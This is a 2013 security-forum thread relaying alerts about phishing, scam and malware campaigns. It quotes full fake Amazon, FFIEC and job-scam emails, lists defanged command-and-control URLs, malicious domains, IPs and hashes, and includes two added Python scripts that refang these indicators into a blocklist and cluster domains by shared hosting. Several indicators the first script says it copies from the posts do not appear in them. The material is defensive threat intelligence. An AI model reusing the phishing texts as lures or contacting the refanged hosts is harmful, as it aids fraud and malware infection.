These types of spoof emails still work, fooling too many people. As always, if you hover your mouse cursor over the hyperlink it becomes easy to tell that the email is not legitimate.
> http://msmvps.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/spywaresucks.metablogapi/5483.image_5F00_thumb_5F00_21200751.png
___
Dear Facebook, this change sucks
- http://msmvps.com/blogs/spywaresucks/archive/2013/01/03/1822008.aspx
Jan 3 2013 - "1. I don’t want to receive emails (aka most likely SPAM) from strangers.
> http://msmvps.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/spywaresucks.metablogapi/0844.image_5F00_thumb_5F00_15139385.png
2. Your “control who can send you messages” link is broken.
> http://msmvps.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/spywaresucks.metablogapi/3426.image_5F00_thumb_5F00_7E249C3B.png
> http://msmvps.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/spywaresucks.metablogapi/5355.image_5F00_thumb_5F00_2B09D94A.png
Filed under: I ain't happy about this*...
* http://msmvps.com/blogs/spywaresucks/archive/tags/I+ain_2700_t+happy+about+this_2E00__2E00__2E00__2E00__2E00_/default.aspx
:fear::fear:
AplusWebMaster
2013-02-01, 13:12
FYI...
Fake Booking .com ‘Credit Card was not Accepted’ emails lead to malware
- http://blog.webroot.com/2013/02/01/fake-booking-com-credit-card-was-not-accepted-themed-emails-lead-to-malware/
Feb 1, 2013 - "Cybercriminals are mass mailing tens of thousands of emails, impersonating Booking .com, in an attempt to trick its users into thinking that their credit card was not accepted. Users are then urged to click on a fake “Print Booking Details” link, which leads them to the malware used in the campaign...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/01/fake_booking_credit_card_not_accepted_hotel_reservation_email_spam_malware.png
... Sample detection rate for the malicious executable: MD5: 75db84cfb0e1932282433cdb113fb689 * ... TrojanDownloader:Win32/Kuluoz.B...
Once executed, the sample phones back to the following command and control (C&C) servers:
More malware variants are known to have phoned back to the same IPs..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/file/1fccbab2964e9f0afa46efacfabcd92fb7d655a59d8a33285ca98d00632b50e6/analysis/1359641226/
File name: BookingInfo.exe
Detection ratio: 26/46
Analysis date: 2013-01-31
___
Fake Photo SPAM / eghirhiam .ru
- http://blog.dynamoo.com/2013/02/photos-spam-eghirhiamru.html
1 Feb 2013 - "Here's a tersely-worded Photos spam leading to malware on eghirhiam .ru:
Subject: Photos
Good day,
your photos here http: //www.jonko .com/photos.htm
As is usually the case, the malware -bounces- through a legitimate hacked site and in this case ends up at [donotclick]eghirhiam .ru:8080/forum/links/public_version.php (report here) hosted on:
82.148.98.36 (Qatar Telecom, Qatar)
195.210.47.208 (PS Internet Company Ltd, Kazakhstan)
202.72.245.146 (Railcom, Mongolia)
The following IPs and domains are all related and should be blocked..."
___
Something evil on 50.116.40.194
- http://blog.dynamoo.com/2013/02/something-evil-on-5011640194.html
1 Feb 2013 - "50.116.40.194 (Linode, US) is hosting the Blackhole Exploit Kit (e.g. [donotclick]14.goodstudentloans .org/read/walls_levels.php - report here*) and seems to have been active in the past 24 hours. I can see two domains at present, although there are probably many more ready to go:
14.goodstudentloans .org
14.mattresstoppersreviews .net"
* http://urlquery.net/report.php?id=903191
:fear: :mad:
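The posts in this thread print their indicators defanged ("[donotclick]" prefixes, "hxxp ://", a space before the TLD or the port, a trailing "..." for an elided path), which is safe to read but useless to paste into a proxy blocklist as-is. The following Python script is an added example, not code from dynamoo, Webroot or any other source quoted above: it refangs indicator strings copied from the posts into a host blocklist and checks constructed proxy log lines against it.

```python
"""Refang the defanged indicators quoted in this thread and check proxy
logs against them.  Added example: the indicator strings are copied from
the posts above, the proxy log lines are constructed for the demo."""
import re

# Indicators exactly as the posts print them.  The thread defangs them by
# inserting a space before the TLD or the port, spelling "http" as "hxxp",
# prefixing "[donotclick]" and ending elided paths with "...".
INDICATORS = [
    "[donotclick]eziponoma .ru:8080/forum/links/column.php",
    "hxxp:// 66.232.145.174 :6667...",
    "hxxp :// 195.191.22.90 :8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/",
    "www .igrandpalacegold .com",
    "[donotclick]123435jynfbdf.myWWW .biz./closest/984y3fh8u3hfu3jcihei.php",
    "dfudont .ru :8080/[REMOVED]/column.php...",
]


def refang(indicator: str) -> str:
    """Reverse the thread's defanging so the string is a plain URL or host."""
    s = indicator.strip()
    s = re.sub(r"^\[donotclick\]\s*", "", s)                       # [donotclick]host
    s = re.sub(r"^h(?:xx|tt)p(s?)\s*:\s*//\s*", r"http\1://", s)   # "hxxp :// host"
    s = re.sub(r"\s+\.", ".", s)                                    # "host .ru" -> "host.ru"
    s = re.sub(r"\s+:(?=\d)", ":", s)                               # "host :8080" -> "host:8080"
    s = re.sub(r"\.{2,}$", "", s)                                   # trailing "..." = elided path
    return s


def host_port(indicator: str):
    """Return (host, port) for an indicator or URL; port is None if absent.
    The host is lower-cased and a trailing root dot is dropped, so the
    'myWWW .biz.' spelling in the post and 'mywww.biz' in a log compare equal."""
    url = refang(indicator)
    netloc = re.sub(r"^https?://", "", url).split("/", 1)[0]
    host, _, port = netloc.partition(":")
    return host.lower().rstrip("."), (int(port) if port.isdigit() else None)


def blocklist(indicators) -> set:
    """Set of hosts (domain names and IP literals) to block."""
    return {host_port(i)[0] for i in indicators}


# Constructed proxy log lines in a squid-like layout:
# <epoch> <client ip> <result> <method> <url>
PROXY_LOG = """\
1359645012.101 10.0.0.5 TCP_MISS/200 GET http://www.example.org/index.html
1359645013.204 10.0.0.7 TCP_MISS/200 GET http://eziponoma.ru:8080/forum/links/column.php
1359645014.330 10.0.0.9 TCP_MISS/200 GET http://123435jynfbdf.mywww.biz/closest/984y3fh8u3hfu3jcihei.php
1359645015.017 10.0.0.7 TCP_MISS/503 CONNECT 66.232.145.174:6667
1359645016.552 10.0.0.5 TCP_MISS/200 GET http://dfudont.ru.example.net/
"""


def find_hits(log_text: str, blocked: set) -> list:
    """Return (client, host) pairs whose destination host is on the blocklist.
    Matching is exact on the host: dfudont.ru.example.net does not match
    dfudont.ru, and a blocked throwaway subdomain of a dynamic-DNS provider
    (mymom .info, ns02 .us in the posts) does not block the whole provider."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        client, target = fields[1], fields[4]
        host = host_port(target)[0]
        if host in blocked:
            hits.append((client, host))
    return hits


if __name__ == "__main__":
    blocked = blocklist(INDICATORS)
    for client, host in find_hits(PROXY_LOG, blocked):
        print(f"{client} contacted blocked host {host}")
```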
AplusWebMaster
2013-02-04, 14:26
FYI...
Fake StumbleUpon SPAM / drugstorepillstablets .ru
- http://blog.dynamoo.com/2013/02/stumbleupon-spam-drugstorepillstabletsru.html
4 Feb 2013 - "This fake StumbleUpon spam is something new; it leads to a fake pharma site on drugstorepillstablets .ru:
Date: Mon, 4 Feb 2013 01:01:46 -0600 (CST)
From: StumbleUpon [no-reply @stumblemail .com]
Subject: Update: Changes to Your Email Settings
Hi [redacted],
This is a quick note to let you know about some changes we've made to the email settings in your StumbleUpon account. We've created a bunch of new notification options that allow you to have more control over what types of emails you'll receive from us. These new notification options are not compatible with the old settings, so your settings have been reset. We apologize for any inconvenience, and want to make sure we only send you the emails you want to receive.
Now what? Please click here to head over to your email settings and update your preferences, so we know exactly what emails you'd like to receive from StumbleUpon.
Want to receive all notifications about shares from friends, recommended Stumbles, and more? Great, you don't have to do anything at all!
Thanks for Stumbling,
The StumbleUpon Team
P.S. Haven't signed in for a while and can't remember your password? You can reset it here by entering the email address used in this email.
Please don't reply to this message - for all questions, check out our Help Center. To visit your email settings, please click here.
StumbleUpon | 301 Brannan Street, 6th Floor, San Francisco, CA 94107
There's no surprise to see that the IP address of the spamvertised site is 92.48.119.139 (Simply Transit, UK)..."
(More detail at the dynamoo URL above.)
___
Something evil on 108.61.12.43 and 212.7.192.100
- http://blog.dynamoo.com/2013/02/something-evil-on-108611243-and.html
4 Feb 2013 - "A few sites worth blocking on 108.61.12.43 (Constant Hosting, US) courtesy of Malware Must Die*:
helloherebro .com
painterinvoice .ru
painterinvoicet .ru
immediatelyinvoicew .ru
While you are at it, you might like to block 212.7.192.100** (Dediserv, Netherlands) as well."
* http://malwaremustdie.blogspot.co.uk/2013/02/the-infection-of-styx-exploit-kit.html
** http://malwaremustdie.blogspot.co.uk/2013/01/peeking-at-jdb-exploit-kit-infector.html
___
Phytiva / XCHC pump-and-dump SPAM
- http://blog.dynamoo.com/2013/02/phytiva-xchc-pump-and-dump.html
4 Feb 2013 - "This pump-and-dump spam (at least I assume that's what it is) caught my eye:
From: Hugh Crouch [tacticallyf44 @riceco .com]
Date: 4 February 2013 12:39
Subject: RE: Targeting the global Cosmoceutical market
US leading biotech company is please to introduce a newly launched brand - a hybrid of a proven, existing product line that has been well-managed and conservatively-run for over a decade with a hemp-based product line, utilizing the unique and potent benefits of the plants. Revolutionary formulations target not just the symptom, but also the cause. The plant is the ideal basis for healing solutions and has been utilized for centuries, as skin responds extremely well to its properties.
Its newest Plant based Product lines that have identified over a dozen ailments that we believe that the products will be the superior choice on the market. These ailments include cancer, arthritis, influenza, HIV/ AIDS, PTSD and many more.
We are looking for leading beauty and health care investors. If you are dedicated to making difference in people”s lives, we need your help now more than ever before toprovide excellent and efficient medical and health care for our future researches.
For more information, please visit
You can unsubscribe from all our future email communications at
The email originates from 31.25.91.159 in the Islamic Republic of Iran, spamvertising a site at www .xn--80aakfmpm2afbm .xn--p1ai (yes, that's a valid international domain name) hosted on 111.123.180.11 in China. In all likelihood, Phytiva and its parent company The X-Change Corporation (stock ticker XCHC) are almost definitely nothing to do with this rather odd spam. Avoid."
___
Fake FedEx emails lead to malware
- http://blog.webroot.com/2013/02/04/fake-fedex-tracking-idtracking-numbertracking-detail-themed-emails-lead-to-malware/
Feb 4, 2013 - "... the digital fingerprint of one of the most recently introduced malware variants used in the campaign corresponds to the digital fingerprint of a malware-serving campaign that we’ve already profiled, indicating that they’ve been launched by the same cybercriminal/gang of cybercriminals...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/01/fake_fedex_trackingid_trackingnumber_trackingdetail_spam_email_malware.png
... Detection rate for the malware variants distributed over the past 24 hours:
MD5: bf061265407ea1f7c21fbf5f545c4c2b * ...PAK_Generic.001
The campaign is ongoing, so watch what you click on!..."
(More detail at the websense URL above.)
* https://www.virustotal.com/file/603b65c612b2e65e420679094fdf351e5b649fb1d8d57cda413c3c712749a2a2/analysis/
File name: ukjlbkma.exe
Detection ratio: 30/46
Analysis date: 2013-02-04
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Tax Documents Notification E-mail Messages - February 04, 2013
Fake Apple Coupon Offer E-mail Messages - February 04, 2013
Malicious Attachment E-mail Message - February 04, 2013
Fake Product Order Request E-mail Messages - February 04, 2013
Fake Portuguese Money Deposit E-mail Messages - February 04, 2013
Fake Purchase Order Notification E-mail Messages - February 04, 2013
Fake Product Order E-mail Message - February 04, 2013
Fake Telegraphic Transfer E-mail Messages - February 04, 2013
Fake Money Transfer Notification E-mail Messages - February 04, 2013
Malicious Personal Photograph Attachment E-mail Messages - February 04, 2013
Malicious Personal Pictures Attachment E-mail Messages - February 04, 2013
Fake Xerox Scan Attachment E-mail Messages - February 04, 2013
(More detail and links at the cisco URL above.)
:mad::fear:
AplusWebMaster
2013-02-05, 15:18
FYI...
Fake ‘Your Kindle e-book Amazon receipt’ emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2013/02/05/your-kindle-e-book-amazon-receipt-themed-emails-lead-to-black-hole-exploit-kit/
5 Feb 2013 - "Kindle owners, watch what you click on! Cybercriminals are currently attempting to trick Kindle owners into thinking that they’ve received a receipt from an E-book purchase from Amazon .com. In reality, when users click on -any- of the links found in the malicious emails, they’re automatically exposed to the client-side exploits served by the Black Hole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/02/email_spam_exploits_malware_amazon_kindle_ebook_receipt_black_hole_exploit_kit.png
... Malicious domain name reconnaissance:
starsoftgroup.net – 175.121.229.209; 198.144.191.50 – Email: wondermitch @hotmail .com
Name Server: NS1.HTTP-PAGE .NET
Name Server: NS2.HTTP-PAGE .NET
We’ve already seen the same name servers used in the following previously profiled campaigns, indicating that they’ve been launched by the same cybercriminals... Upon successful client-side exploitation, the campaign drops MD5: 13d23f4c1eb1d4d3841e2de50b1948cc * ... UDS:DangerousObject.Multi.Generic...
Upon execution, the sample also phones back to the following C&C servers:
hxxp :// 195.191.22.90 :8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
hxxp :// 37.122.209.102 :8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
hxxp :// 217.65.100.41 :8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
hxxp :// 173.201.177.77 /J9/vp//EGa+AAAAAA/2MB9vCAAAA/
hxxp :// 210.56.23.100 /J9/vp//EGa+AAAAAA/2MB9vCAAAA/
hxxp :// 213.214.74.5 /J9/vp//EGa+AAAAAA/2MB9vCAAAA/
hxxp :// 180.235.150.72 /J9/vp//EGa+AAAAAA/2MB9vCAAAA/
We’ve already seen the same pseudo-random C&C communication characters (DPNilBA) used... As well as the same C&C server IPs (173.201.177.77; 210.56.23.100; 180.235.150.72) ...
(More detail at the webroot URL above.)
* https://www.virustotal.com/file/74bd78604851d43853035e20e1a96df398e6f91a92df6988b067c5e39af4e6a2/analysis/
File name: DWIntl20.Dll
Detection ratio: 7/46
Analysis date: 2013-02-04
___
Free Disneyland Tickets Survey SCAM
- http://www.hoax-slayer.com/disneyland-tickets-survey-scam.shtml
Feb 5, 2013
Outline: Various -Facebook- messages claim that users can receive free tickets to Disneyland by liking and sharing a picture and participating in online surveys.
Brief Analysis: The supposed giveaways are scams designed to trick people into spamming their friends and participating in -bogus- online surveys. No matter how many surveys they complete, participants will -never- receive the promised Disneyland tickets. These offers are not endorsed by and have no connection to Disney. If you receive one of these messages, do not click any links that it contains.
> http://www.hoax-slayer.com/images/disneyland-tickets-scam.jpg
___
Fake Amazon .com SPAM / salam-tv .com
- http://blog.dynamoo.com/2013/02/amazoncom-spam-salam-tvcom.html
5 Feb 2013 - "This fake Amazon email leads to malware on salam-tv .com:
Date: Tue, 5 Feb 2013 18:32:06 +0100
From: "Amazon.com Orders" [no-reply @amazon .com]
Subject: Your Amazon.com order receipt.
Click here if the e-mail below is not displayed correctly.
Follow us:
Your Amazoncom Today's Deals See All Departments
Dear Amazon.com Customer,
Thanks for your order, [redacted]!
Did you know you can view and edit your orders online, 24 hours a day? Visit Your Account.
Order Details:
E-mail Address: [redacted]
Billing Address:
1170 CROSSING CRK N Rd.
Fort Wayne OH 49476-1748
United States
Phone: 1- 749-787-0001
Order Grand Total: $ 91.99
Earn 3% rewards on your Amazon .com orders with the Amazon Visa Card. Learn More
Order Summary:
Details:
Order #: C59-2302433-5787713
Subtotal of items: $ 91.99
Total before tax: $ 91.99
Tax Collected: $0.00
Grand Total: $ 90.00
Gift Certificates: $ 1.99
Total for this Order: $ 91.99
Find Great Deals on Millions of Items Storewide
We hope you found this message to be useful. However, if you'd rather not receive future e-mails of this sort from Amazon.com, please opt-out here.
2012 Amazon.com, Inc. or its affiliates. All rights reserved. Amazon, Amazon .com, the Amazon .com logo and 1-Click are registered trademarks of Amazon .com, Inc. or its affiliates. Amazon .com, 466 Sally Ave. N., Seattle, MA 71168-8282. Reference: 25090571
Please note that this message was sent to the following e-mail address: [redacted]
The malicious payload should be at [donotclick]salam-tv .com/detects/visit_putts.php but at the moment this domain doesn't seem to be resolving properly. A bit of digging around shows that it may be hosted on 198.144.191.50 (Chicago VPS, US) and the following malicious domains can be traced to that IP address:
morepowetradersta .com
capeinn .net
starsoftgroup .net
salam-tv .com "
___
Malwarebytes uncovers digital certificate-spoofing Trojan
- http://blog.malwarebytes.org/intelligence/2013/02/digital-certificates-and-malware-a-dangerous-mix/
Update (Feb 4th, 3:44 PM): Egnyte has promptly taken down the illicit account following our call. However, the digital signature is still in use.
"... we just spotted a new malware sample (Brazilian banking/password stealer) which happens to be signed with a real and valid digital certificate issued by DigiCert:
> http://blog.malwarebytes.org/wp-content/uploads/2013/02/digi1.png
This certificate is issued to a company called “Buster Paper Comercial Ltda”, a Brazilian company that actually does -not- exist and was registered with bogus data... The file – disguised as a PDF document (an invoice) – actually opens up as such to really fool the victim:
> http://blog.malwarebytes.org/wp-content/uploads/2013/02/invoice.png
... the malware connects to: som.egnyte .com ... size matters as many antivirus scanners have trouble with detecting larger files. Digging a little deeper, this is not a new case at all. In fact, last November the same kind of digitally signed Trojan was also distributed (See this ThreatExpert report* for proof). Its certificate has, since then, been revoked... What we have here is a total abuse of hosting services, digital certificates and repeated offenses from the same people... Digital certificate theft can be used in targeted attacks as a spear phishing attack for example...An attacker can easily find out or guess what antivirus a company is running and craft a piece of malware that will not be detected by it. Because such attacks are very narrow, the sample will not be disseminated around the world, making its discovery less likely..."
* http://www.threatexpert.com/report.aspx?md5=cff3b8ec4c49051811213d3551eb3c28
:mad: :fear:
AplusWebMaster
2013-02-06, 16:22
FYI...
Fake job offer inukjob .com, ineurojob .com and hollandsjob .com
- http://blog.dynamoo.com/2013/02/inukjobcom-fake-job-offer-also.html
6 Feb 2013 - "This fake job offer from inukjob .com involves illegal money laundering, and it also seems that the scammers want to use your identity for "correspondence" which normally means things like reshipping stolen goods and identity theft.
From: Victim
To: Victim
Date: 6 February 2013 09:16
Subject: Looking for remote assistants, paid $ 100 per hour helping other people
Good afternoon!
Is it possible for you to spare a few hours a week to the new occupation, which would increase your wages in 2-3 times, without investing a penny? While you are looking for the trick in this offer, hundreds of your compatriots have already been reaping the benefits of working with us.
This is not a financial pyramid or marketing of any kind. It's about doing simple assignments, not exceed the limits of morals or ethics.
Your gender, age, employment do not matter - the main factors are your diligence and conscientiousness.
Lots of our employees began with a part-time employment and combined with other jobs, but two weeks later,
most of them devoted themselves to our job.
We are in all respects ready to remove all your doubts and help you to understand all details.
Position is called the "Regional Manager".
Functional duties:
- to represent the interests of foreign companies in the region (For example: providing your address for correspondence.)
- to take control of transactions between the company and the client in your area.
For more information, please, email us attaching your CV, the country and city of residence.
It will considerably increase your chances for employment. Email: Kelsey @inukjob .com
Best Regards,
PR Manager
I've seen another variant with a reply address of Delores @inukjob .com. In all these cases, the email appears to come from the victim (here's why*). Let's dig a little deeper into the domain. It turns out that it is registered by scam-friendly Chinese registrar BIZCN .COM. The WHOIS details are fake:
Tara Zwilling info @inukjob .com
315-362-4562 fax: 315-362-4511
3201 Oak Street
Syracuse NY 13221
us
There is -no- number 3201 Oak Street in Syracuse, New York (see for yourself**) and the Zip code is incorrect, it should be 13203 and -not- 13221. There's -no- web site, mail is handled by a server at 31.214.169.94 (Exetel, Germany). The following mailservers can be found at that IP:
mx.ineurojob .com
mx.hollandsjob .com
mx.inukjob .com
You can assume that all these domains are fraudulent. If we dig a little deeper at the nameservers ns1.ariparts .net (also on 31.214.169.94) and ns2.ariparts .net (8.163.20.161, Level 3, US), then we can also find the following very dodgy domains:
hollandsjob .com
pracapolsk .com
ariparts .net
ineurojob .com
All these domains have fake or hidden registration details and can be assumed to be part of a scam. Avoid."
* http://blog.dynamoo.com/2011/09/why-am-i-sending-myself-spam.html
** http://goo.gl/maps/KimC4
___
Google store - malicious apps
- http://blog.webroot.com/2013/02/05/android-security-tips-and-windows-autorun-protection/
5 Feb 2013 - "Recently, two applications designed with malicious intent were discovered within the Google Play application store. The apps were built with a façade of being utility cleaners designed to help optimize Android-powered phones, but in reality, both apps had code built in designed to copy private files, including photos, and submit them to remote servers. The applications, named SuperClean and DroidClean, did not stop there. Researchers also found that the malware was able to AutoRun on Windows PC devices when the phones were paired, and infect the main computer. The malware was designed to record audio through the computer’s microphone. AutoRun has often been used as a method of infection, and Microsoft has since sent a security fix out to Windows XP/Vista/7 in order to disable the exploitable element. In some cases, however, the feature might have been re-enabled by the user for convenience or never changed through a backlog of updates. An application such as this has not been seen in the past, and is showing the creative methods through which malware coders are attempting to break through a computer’s security. With the Android device acting as a Trojan horse for the infection, malicious code has the potential of bypassing established security parameters that typically keep endpoint users safe within their network. While Webroot has classified the malicious apps, which have been removed from Google Play’s market, it goes to show that protective steps are necessary on all levels of devices to avoid an infection... For all users, we recommend ensuring that AutoRun is -disabled- on your computer. Even though Microsoft rolled out updates to disable, it is possible it could be enabled. Finally, always ensure you scan USB and other connected devices for malware before storing data or using on other PCs."
:mad: :mad:
AplusWebMaster
2013-02-07, 15:26
FYI...
Fake FFIEC SPAM / live-satellite-view .net
- http://blog.dynamoo.com/2013/02/ffiec-spam-live-satellite-viewnet.html
7 Feb 2013 - "This spam attempts to load malware from live-satellite-view .net, but fails because at the moment the domain isn't registered. However, you can expect them to try again... so watch out for emails like this.
From: FFIEC [mailto:complaints @ffiec .gov]
Sent: 06 February 2013 16:17
Subject: FFIEC Occasion No. 77715
This summons is meant to make advise of file # 77715 which is opened and under interrogative with FFIEC following a accusation of your Financial Institution regarding suspect financial activity on your account.
A hard copy of this judicial process will be delivered to your business address.
Our institution will forward information to competent government agencies following this accusation.
Information and contacts regarding your Occasion file # can be found at
Occasion Number: 77715
Observed by
Federal Financial Institution Examination Council
Emily Gray
The attempted download is from [donotclick]live-satellite-view .net/detects/advanced_selected_determines_comparison.php although it fails to resolve. Perhaps the registrar nuked the domain? However, it is possible to tell that the nameservers were ns1.http-page .net and ns2.http-page .net, and upon investigation it turns out that all the following IPs and domains are related and should be treated as malicious:
7.129.51.158
31.170.106.17
74.4.6.128
98.144.191.50
175.121.229.209
198.144.191.50
208.117.43.145
222.238.109.66
able-stock .net
capeinn .net
duriginal .net
euronotedetector .net
gonita .net
gutprofzumbns .com
http-page .net
live-satellite-view .net
morepowetradersta .com
ocean-movie .net
starsoftgroup .net
vespaboise .net "
___
Ransomware Spam Pages on Github, Sourceforge, Others
- http://www.gfi.com/blog/ransomware-spam-pages-on-github-sourceforge-others/
Feb 7, 2013 - "There’s currently a large and determined effort to infect computers with Ransomware, courtesy of the Stamp EK exploit kit... The bait for most of these redirects to Ransomware appears to be a slice of US news reporters in various “fake” (ie nonexistent) nude pictures, along with a smattering of film actresses / singers – in other words, the usual shenanigans. Curiously, we’ve observed a lot of wrestlers / people involved in the wrestling industry listed on many of the spam pages too... There are pages and pages of ripped content sitting on various websites such as one located on a .ua domain... So far we have observed Weelsof and Reveton Ransomware being dropped. The below piece of Ransomware is demanding $300 to “Unlock your computer and avoid other legal consequences”. As with other similar forms of Ransomware, it accuses the user of accessing illegal pornography and makes no bones about the fact that they should be paying up “or else”... Unfortunately much of the same content can currently be found on both Github and Sourceforge, typically in the form of a Youtube page or a collection of sex pictures lifted from a real porn site. We’ve also seen air rifle stores, a rip of a Windows for Dummies site, Twitter pages and a whole lot more besides. A lot of these pages seem to be in the process of being taken down, but there’s still enough floating around out there to be a problem..."
(Screenshots available at the gfi URL above.)
___
Telepests... Robocalls ...
- http://blog.dynamoo.com/2013/02/20-3-2983245-telepest.html
7 Feb 2013 - "For some reason I've been plagued with cold calling telepests recently. This particular one (+20 3 2983245) offered the usual "press 5 to be ripped off" and "press 9 to try to unsubscribe which we will ignore" recorded message about claiming for an accident. There was a very politely spoken and nice young man on the end of the phone. He seemed a bit perplexed and upset when I told him to f**k off and leave me alone. Good. I don't know exactly who is behind this nuisance activity, but they were calling a TPS-registered phone from a number in Alexandria, Egypt. Offshoring fraudulent activity like this is quite common, but this is the first time that I've had to swear at an Egyptian. Perhaps the poor guy will consider doing something less scummy instead."
- https://www.bbb.org/blog/2013/01/consumers-phones-being-flooded-with-annoying-robocalls/
> http://www.ftc.gov/bcp/edu/microsites/robocalls/
___
Whitehole Exploit Kit in-the-wild...
- http://blog.trendmicro.com/trendlabs-security-intelligence/whitehole-exploit-kit-emerges/
Feb 6, 2013 - "... there is news of an emerging exploit kit dubbed Whitehole Exploit Kit. The name Whitehole Exploit Kit is just a randomly selected name to differentiate it from BHEK. While it uses similar code as Blackhole Exploit kit, BHEK in particular uses JavaScript to hide its usage of plugindetect.js, while Whitehole does not. It directly uses it without obfuscating this. We analysed the related samples, including the exploit malware cited in certain reports. The malware (detected as JAVA_EXPLOYT.NTW) takes advantage of the following vulnerabilities to download malicious files onto the system:
• CVE-2012-5076
• CVE-2011-3544
• CVE-2012-4681
• CVE-2012-1723
• CVE-2013-0422
Worth noting is CVE-2013-0422, which was involved in the zero-day incident that distributed REVETON variants and was used in toolkits like the Blackhole Exploit Kit and Cool exploit kit. Because of its serious security implication, Oracle immediately addressed this issue and released a software update, which was received with skepticism. The downloaded files are detected as BKDR_ZACCESS.NTW and TROJ_RANSOM.NTW respectively. ZACCESS/SIRIEF variants are known bootkit malware that download other malware and push fake applications. This specific ZACCESS variant connects to certain websites to send and receive information as well as terminates certain processes. It also downloads additional malicious files onto already infected systems. On the other hand, ransomware typically locks systems until users pay a sum of money via specific payment modes... Whitehole Exploit Kit is purportedly under development and runs in “test-release” mode. However, the people behind this kit are already peddling the kit and even command a fee ranging from USD 200 to USD 1800. Other notable features of this new toolkit include its ability to evade antimalware detections, to prevent Google Safe Browsing from blocking it, and to load a maximum of 20 files at once. Given Whitehole’s current state, we may be seeing more noteworthy changes to the exploit kit these coming months. Thus, we are continuously monitoring this threat for any developments..."
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Bank Wire Transfer Notification E-mail Messages - February 07, 2013
Fake Real Estate Offer E-mail Messages - February 07, 2013
Fake Money Transfer Notification E-mail Messages - February 07, 2013
Fake Debt Collection E-mail Messages - February 07, 2013
Fake Money Transfer Notification E-mail Messages - February 07, 2013
Malicious Attachment E-mail Messages - February 07, 2013
Fake Product Order Quotation Attachment E-mail Messages - February 07, 2013
(More detail and links available at the cisco URL above.)
:mad:
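The infrastructure pivoting done in the posts above (tracing salam-tv .com, capeinn .net and starsoftgroup .net back to 198.144.191.50, the inukjob / ineurojob / hollandsjob mail servers to 31.214.169.94 and ns1.ariparts .net, and live-satellite-view .net to ns1.http-page .net) can be automated once the observations are in a table. The script below is an added example, not code from the forum or from dynamoo; the observation table is transcribed from the posts, except that unrelated-example.org and the 203.0.113.x address are constructed placeholders. It groups domains that share any hosting, nameserver or mail-server attribute, and the max_shared parameter is the caveat the posts themselves raise: an IP or nameserver used by very many unrelated sites (shared hosting, hijacked legitimate domains) is a weak pivot and is skipped when it links more domains than that limit.

```python
from collections import defaultdict
from typing import Dict, List, Optional, Set

# Observation table transcribed from the posts above. Attribute keys carry a
# type prefix so an IP seen as a web host and the same IP seen as a mail server
# stay distinguishable. "unrelated-example.org" / 203.0.113.9 are constructed
# placeholders, not from the posts.
OBSERVATIONS: Dict[str, Set[str]] = {
    "starsoftgroup.net": {"ip:175.121.229.209", "ip:198.144.191.50",
                          "ns:ns1.http-page.net", "ns:ns2.http-page.net"},
    "salam-tv.com": {"ip:198.144.191.50"},
    "capeinn.net": {"ip:198.144.191.50"},
    "live-satellite-view.net": {"ns:ns1.http-page.net", "ns:ns2.http-page.net"},
    "inukjob.com": {"mx:31.214.169.94", "ns:ns1.ariparts.net", "ns:ns2.ariparts.net"},
    "ineurojob.com": {"mx:31.214.169.94", "ns:ns1.ariparts.net"},
    "hollandsjob.com": {"mx:31.214.169.94", "ns:ns1.ariparts.net"},
    "unrelated-example.org": {"ip:203.0.113.9"},
}


class DisjointSet:
    """Union-find over domain names; two domains end up in one set once any
    chain of shared attributes connects them."""

    def __init__(self, items):
        self.parent = {x: x for x in items}

    def find(self, x: str) -> str:
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]  # path halving
            x = self.parent[x]
        return x

    def union(self, a: str, b: str) -> None:
        ra, rb = self.find(a), self.find(b)
        if ra != rb:
            self.parent[rb] = ra


def cluster(observations: Dict[str, Set[str]],
            max_shared: Optional[int] = None) -> List[List[str]]:
    """Group domains that share at least one attribute. An attribute shared by
    more than max_shared domains is ignored as a pivot: a large shared-hosting
    IP or a popular DNS provider would otherwise merge everything."""
    by_attr: Dict[str, Set[str]] = defaultdict(set)
    for domain, attrs in observations.items():
        for attr in attrs:
            by_attr[attr].add(domain)

    ds = DisjointSet(observations)
    for attr, domains in by_attr.items():
        if max_shared is not None and len(domains) > max_shared:
            continue  # too common to mean anything on its own
        first, *rest = sorted(domains)
        for d in rest:
            ds.union(first, d)

    groups: Dict[str, Set[str]] = defaultdict(set)
    for d in observations:
        groups[ds.find(d)].add(d)
    # Deterministic output: each group sorted, groups sorted by first member.
    return sorted((sorted(g) for g in groups.values()), key=lambda g: g[0])


def link_reasons(observations: Dict[str, Set[str]], a: str, b: str) -> List[str]:
    """The attributes two domains have in common, i.e. why the pivot joined them."""
    return sorted(observations[a] & observations[b])


if __name__ == "__main__":
    for group in cluster(OBSERVATIONS):
        print(group)
    print(link_reasons(OBSERVATIONS, "inukjob.com", "ineurojob.com"))
```

With no limit the table yields three groups: the http-page / 198.144.191.50 cluster, the ariparts / 31.214.169.94 job-scam cluster, and the placeholder on its own. With max_shared=2 the three-way shared IP and mail server stop counting as evidence and most domains fall back to singletons, which is the trade-off to tune against how noisy the hosting in question is.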
AplusWebMaster
2013-02-08, 18:14
FYI...
radarsky .biz and something evil on 5.135.67.160/28
- http://blog.dynamoo.com/2013/02/radarskybiz-and-something-evil-on.html
8 Feb 2013 - "There is currently an injection attack -redirecting- visitors to a domain radarsky .biz (for example) hosted on 5.135.67.173 (OVH*) and suballocated to:
inetnum: 5.135.67.160 - 5.135.67.175
netname: MMuskatov-FI
descr: MMuskatov
country: FI
org: ORG-OH6-RIPE
admin-c: OTC15-RIPE
tech-c: OTC15-RIPE
status: ASSIGNED PA
